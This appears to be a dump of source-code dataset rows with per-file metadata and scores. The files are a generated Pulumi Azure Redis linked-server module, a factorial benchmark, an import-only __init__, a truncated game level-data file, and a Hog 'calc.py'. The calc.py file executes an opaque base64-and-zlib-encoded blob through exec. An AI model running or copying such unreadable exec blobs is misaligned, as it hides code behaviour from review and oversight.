| 36.639623
| 0.872356
| 0.436325
| 0
| 0.904173
| 0
| 0
| 0.076864
| 0.00143
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032458
| false
| 0.026275
| 0.004637
| 0
| 0.071097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48631eadbb959dda7f40176743cbf3a8115f2d4f
| 22,431
|
py
|
Python
|
sdk/python/pulumi_azure/redis/linked_server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/redis/linked_server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/redis/linked_server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['LinkedServerArgs', 'LinkedServer']
@pulumi.input_type
class LinkedServerArgs:
def __init__(__self__, *,
linked_redis_cache_id: pulumi.Input[str],
linked_redis_cache_location: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
server_role: pulumi.Input[str],
target_redis_cache_name: pulumi.Input[str]):
"""
The set of arguments for constructing a LinkedServer resource.
:param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
:param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
:param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
pulumi.set(__self__, "linked_redis_cache_id", linked_redis_cache_id)
pulumi.set(__self__, "linked_redis_cache_location", linked_redis_cache_location)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_role", server_role)
pulumi.set(__self__, "target_redis_cache_name", target_redis_cache_name)
@property
@pulumi.getter(name="linkedRedisCacheId")
def linked_redis_cache_id(self) -> pulumi.Input[str]:
"""
The ID of the linked Redis cache. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "linked_redis_cache_id")
@linked_redis_cache_id.setter
def linked_redis_cache_id(self, value: pulumi.Input[str]):
pulumi.set(self, "linked_redis_cache_id", value)
@property
@pulumi.getter(name="linkedRedisCacheLocation")
def linked_redis_cache_location(self) -> pulumi.Input[str]:
"""
The location of the linked Redis cache. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "linked_redis_cache_location")
@linked_redis_cache_location.setter
def linked_redis_cache_location(self, value: pulumi.Input[str]):
pulumi.set(self, "linked_redis_cache_location", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverRole")
def server_role(self) -> pulumi.Input[str]:
"""
The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "server_role")
@server_role.setter
def server_role(self, value: pulumi.Input[str]):
pulumi.set(self, "server_role", value)
@property
@pulumi.getter(name="targetRedisCacheName")
def target_redis_cache_name(self) -> pulumi.Input[str]:
"""
The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
return pulumi.get(self, "target_redis_cache_name")
@target_redis_cache_name.setter
def target_redis_cache_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_redis_cache_name", value)
@pulumi.input_type
class _LinkedServerState:
def __init__(__self__, *,
linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_role: Optional[pulumi.Input[str]] = None,
target_redis_cache_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering LinkedServer resources.
:param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] name: The name of the linked server.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
:param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
:param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
if linked_redis_cache_id is not None:
pulumi.set(__self__, "linked_redis_cache_id", linked_redis_cache_id)
if linked_redis_cache_location is not None:
pulumi.set(__self__, "linked_redis_cache_location", linked_redis_cache_location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if server_role is not None:
pulumi.set(__self__, "server_role", server_role)
if target_redis_cache_name is not None:
pulumi.set(__self__, "target_redis_cache_name", target_redis_cache_name)
@property
@pulumi.getter(name="linkedRedisCacheId")
def linked_redis_cache_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the linked Redis cache. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "linked_redis_cache_id")
@linked_redis_cache_id.setter
def linked_redis_cache_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "linked_redis_cache_id", value)
@property
@pulumi.getter(name="linkedRedisCacheLocation")
def linked_redis_cache_location(self) -> Optional[pulumi.Input[str]]:
"""
The location of the linked Redis cache. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "linked_redis_cache_location")
@linked_redis_cache_location.setter
def linked_redis_cache_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "linked_redis_cache_location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the linked server.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverRole")
def server_role(self) -> Optional[pulumi.Input[str]]:
"""
The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "server_role")
@server_role.setter
def server_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_role", value)
@property
@pulumi.getter(name="targetRedisCacheName")
def target_redis_cache_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
return pulumi.get(self, "target_redis_cache_name")
@target_redis_cache_name.setter
def target_redis_cache_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_redis_cache_name", value)
class LinkedServer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_role: Optional[pulumi.Input[str]] = None,
target_redis_cache_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Redis Linked Server (ie Geo Location)
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_primary_resource_group = azure.core.ResourceGroup("example-primaryResourceGroup", location="East US")
example_primary_cache = azure.redis.Cache("example-primaryCache",
location=example_primary_resource_group.location,
resource_group_name=example_primary_resource_group.name,
capacity=1,
family="P",
sku_name="Premium",
enable_non_ssl_port=False,
redis_configuration=azure.redis.CacheRedisConfigurationArgs(
maxmemory_reserved=2,
maxmemory_delta=2,
maxmemory_policy="allkeys-lru",
))
example_secondary_resource_group = azure.core.ResourceGroup("example-secondaryResourceGroup", location="West US")
example_secondary_cache = azure.redis.Cache("example-secondaryCache",
location=example_secondary_resource_group.location,
resource_group_name=example_secondary_resource_group.name,
capacity=1,
family="P",
sku_name="Premium",
enable_non_ssl_port=False,
redis_configuration=azure.redis.CacheRedisConfigurationArgs(
maxmemory_reserved=2,
maxmemory_delta=2,
maxmemory_policy="allkeys-lru",
))
example_link = azure.redis.LinkedServer("example-link",
target_redis_cache_name=example_primary_cache.name,
resource_group_name=example_primary_cache.resource_group_name,
linked_redis_cache_id=example_secondary_cache.id,
linked_redis_cache_location=example_secondary_cache.location,
server_role="Secondary")
```
## Import
Redis can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:redis/linkedServer:LinkedServer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Cache/Redis/cache1/linkedServers/cache2
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
:param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
:param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LinkedServerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Redis Linked Server (ie Geo Location)
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_primary_resource_group = azure.core.ResourceGroup("example-primaryResourceGroup", location="East US")
example_primary_cache = azure.redis.Cache("example-primaryCache",
location=example_primary_resource_group.location,
resource_group_name=example_primary_resource_group.name,
capacity=1,
family="P",
sku_name="Premium",
enable_non_ssl_port=False,
redis_configuration=azure.redis.CacheRedisConfigurationArgs(
maxmemory_reserved=2,
maxmemory_delta=2,
maxmemory_policy="allkeys-lru",
))
example_secondary_resource_group = azure.core.ResourceGroup("example-secondaryResourceGroup", location="West US")
example_secondary_cache = azure.redis.Cache("example-secondaryCache",
location=example_secondary_resource_group.location,
resource_group_name=example_secondary_resource_group.name,
capacity=1,
family="P",
sku_name="Premium",
enable_non_ssl_port=False,
redis_configuration=azure.redis.CacheRedisConfigurationArgs(
maxmemory_reserved=2,
maxmemory_delta=2,
maxmemory_policy="allkeys-lru",
))
example_link = azure.redis.LinkedServer("example-link",
target_redis_cache_name=example_primary_cache.name,
resource_group_name=example_primary_cache.resource_group_name,
linked_redis_cache_id=example_secondary_cache.id,
linked_redis_cache_location=example_secondary_cache.location,
server_role="Secondary")
```
## Import
Redis can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:redis/linkedServer:LinkedServer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Cache/Redis/cache1/linkedServers/cache2
```
:param str resource_name: The name of the resource.
:param LinkedServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LinkedServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_role: Optional[pulumi.Input[str]] = None,
target_redis_cache_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LinkedServerArgs.__new__(LinkedServerArgs)
if linked_redis_cache_id is None and not opts.urn:
raise TypeError("Missing required property 'linked_redis_cache_id'")
__props__.__dict__["linked_redis_cache_id"] = linked_redis_cache_id
if linked_redis_cache_location is None and not opts.urn:
raise TypeError("Missing required property 'linked_redis_cache_location'")
__props__.__dict__["linked_redis_cache_location"] = linked_redis_cache_location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_role is None and not opts.urn:
raise TypeError("Missing required property 'server_role'")
__props__.__dict__["server_role"] = server_role
if target_redis_cache_name is None and not opts.urn:
raise TypeError("Missing required property 'target_redis_cache_name'")
__props__.__dict__["target_redis_cache_name"] = target_redis_cache_name
__props__.__dict__["name"] = None
super(LinkedServer, __self__).__init__(
'azure:redis/linkedServer:LinkedServer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_role: Optional[pulumi.Input[str]] = None,
target_redis_cache_name: Optional[pulumi.Input[str]] = None) -> 'LinkedServer':
"""
Get an existing LinkedServer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
:param pulumi.Input[str] name: The name of the linked server.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
:param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
:param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LinkedServerState.__new__(_LinkedServerState)
__props__.__dict__["linked_redis_cache_id"] = linked_redis_cache_id
__props__.__dict__["linked_redis_cache_location"] = linked_redis_cache_location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["server_role"] = server_role
__props__.__dict__["target_redis_cache_name"] = target_redis_cache_name
return LinkedServer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="linkedRedisCacheId")
def linked_redis_cache_id(self) -> pulumi.Output[str]:
"""
The ID of the linked Redis cache. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "linked_redis_cache_id")
@property
@pulumi.getter(name="linkedRedisCacheLocation")
def linked_redis_cache_location(self) -> pulumi.Output[str]:
"""
The location of the linked Redis cache. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "linked_redis_cache_location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the linked server.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serverRole")
def server_role(self) -> pulumi.Output[str]:
"""
The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
"""
return pulumi.get(self, "server_role")
@property
@pulumi.getter(name="targetRedisCacheName")
def target_redis_cache_name(self) -> pulumi.Output[str]:
"""
The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
"""
return pulumi.get(self, "target_redis_cache_name")
| 48.23871
| 204
| 0.674201
| 2,772
| 22,431
| 5.166667
| 0.071789
| 0.093562
| 0.099427
| 0.046432
| 0.887236
| 0.871736
| 0.856654
| 0.836894
| 0.832914
| 0.820067
| 0
| 0.004863
| 0.239178
| 22,431
| 464
| 205
| 48.342672
| 0.834349
| 0.40979
| 0
| 0.575893
| 1
| 0
| 0.141841
| 0.07164
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15625
| false
| 0.004464
| 0.022321
| 0
| 0.272321
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f8add949090b45174a43368df9ab63681599f53
| 185
|
py
|
Python
|
benchmarks/tail-factorial.py
|
c1m5j/pancake
|
f8c3c6045e147a0569d7cc0a11914c2e5306e662
|
[
"MIT"
] | 5
|
2021-10-09T12:54:10.000Z
|
2021-10-30T01:29:05.000Z
|
benchmarks/tail-factorial.py
|
c1m5j/pancake
|
f8c3c6045e147a0569d7cc0a11914c2e5306e662
|
[
"MIT"
] | 1
|
2021-10-31T08:54:15.000Z
|
2021-10-31T08:54:15.000Z
|
benchmarks/tail-factorial.py
|
c1m5j/pancake
|
f8c3c6045e147a0569d7cc0a11914c2e5306e662
|
[
"MIT"
] | 1
|
2021-10-18T06:20:42.000Z
|
2021-10-18T06:20:42.000Z
|
def factorial_accumulate(n, acc):
if n == 0: return acc
return factorial_accumulate(n - 1, acc*n)
def factorial(n):
return factorial_accumulate(n, 1)
print(factorial(20))
| 20.555556
| 45
| 0.697297
| 28
| 185
| 4.5
| 0.392857
| 0.452381
| 0.47619
| 0.412698
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033113
| 0.183784
| 185
| 8
| 46
| 23.125
| 0.801325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
6fcd8e6686974e8dc3d5d6017b3bac0a0c41c512
| 265
|
py
|
Python
|
NameMarkupLanguage/NameMarkInterface/__init__.py
|
sonnts996/NameMarkLanguage
|
448db602371e91d661bbf3de40070904a89e85fa
|
[
"MIT"
] | null | null | null |
NameMarkupLanguage/NameMarkInterface/__init__.py
|
sonnts996/NameMarkLanguage
|
448db602371e91d661bbf3de40070904a89e85fa
|
[
"MIT"
] | null | null | null |
NameMarkupLanguage/NameMarkInterface/__init__.py
|
sonnts996/NameMarkLanguage
|
448db602371e91d661bbf3de40070904a89e85fa
|
[
"MIT"
] | null | null | null |
from NameMarkupLanguage.NameMarkInterface.NameMark import NameMark
from NameMarkupLanguage.NameMarkInterface.DefTag import DefTag
from NameMarkupLanguage.NameMarkInterface.NMList import NMList
from NameMarkupLanguage.NameMarkInterface.DefManager import DefManager
| 44.166667
| 70
| 0.90566
| 24
| 265
| 10
| 0.333333
| 0.366667
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064151
| 265
| 5
| 71
| 53
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6fd1a56f5dcfa371809d9e29e240e4b6ef669b20
| 2,649
|
py
|
Python
|
projects/hog/calc.py
|
wangjiapengone/CS-61A-Fall18
|
552a39c165b9c15c291967ce261e23dc2985a4b2
|
[
"MIT"
] | 1
|
2021-01-04T05:08:24.000Z
|
2021-01-04T05:08:24.000Z
|
projects/hog/calc.py
|
wangjiapengone/CS-61A-Fall18
|
552a39c165b9c15c291967ce261e23dc2985a4b2
|
[
"MIT"
] | null | null | null |
projects/hog/calc.py
|
wangjiapengone/CS-61A-Fall18
|
552a39c165b9c15c291967ce261e23dc2985a4b2
|
[
"MIT"
] | null | null | null |
import zlib, base64
exec(zlib.decompress(base64.b64decode('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')))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
| 529.8
| 2,563
| 0.96074
| 89
| 2,649
| 28.595506
| 0.966292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148162
| 0.003775
| 2,649
| 4
| 2,564
| 662.25
| 0.816218
| 0.023028
| 0
| 0
| 0
| 0.5
| 0.974855
| 0.974855
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
6fd2c0788af8420d199607616b772cca84a1a494
| 10,860
|
py
|
Python
|
pirates/leveleditor/worldData/SwampTestIslandB.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/SwampTestIslandB.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/SwampTestIslandB.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3
objectStruct = {'Locator Links': [['1153868315.8sdnaik0', '1152910060.11sdnaik', 'Bi-directional'], ['1153868315.8sdnaik1', '1152910301.05sdnaik0', 'Bi-directional'], ['1153868634.75sdnaik0', '1152910060.11sdnaik0', 'Bi-directional'], ['1152910307.13sdnaik', '1156281363.2sdnaik1', 'Bi-directional'], ['1156281161.64sdnaik0', '1156281363.2sdnaik0', 'Bi-directional'], ['1153868634.75sdnaik1', '1156302222.63sdnaik', 'Bi-directional']],'Objects': {'1152909972.77sdnaik': {'Type': 'Island','Name': 'SwampTestIslandB','File': '','Objects': {'1152910060.11sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1152910060.11sdnaik0': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1152910301.05sdnaik': {'Type': 'Island Game Area','File': 'SwampTemplateB','Hpr': VBase3(120.19, 0.0, 0.0),'Objects': 